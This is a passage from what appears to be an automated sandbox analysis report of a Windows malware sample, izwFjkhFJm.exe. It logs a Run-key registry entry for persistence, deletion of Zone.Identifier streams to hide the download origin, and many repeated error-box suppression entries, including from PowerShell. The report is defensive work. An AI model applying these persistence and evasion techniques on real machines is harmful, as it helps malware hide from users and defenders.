              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
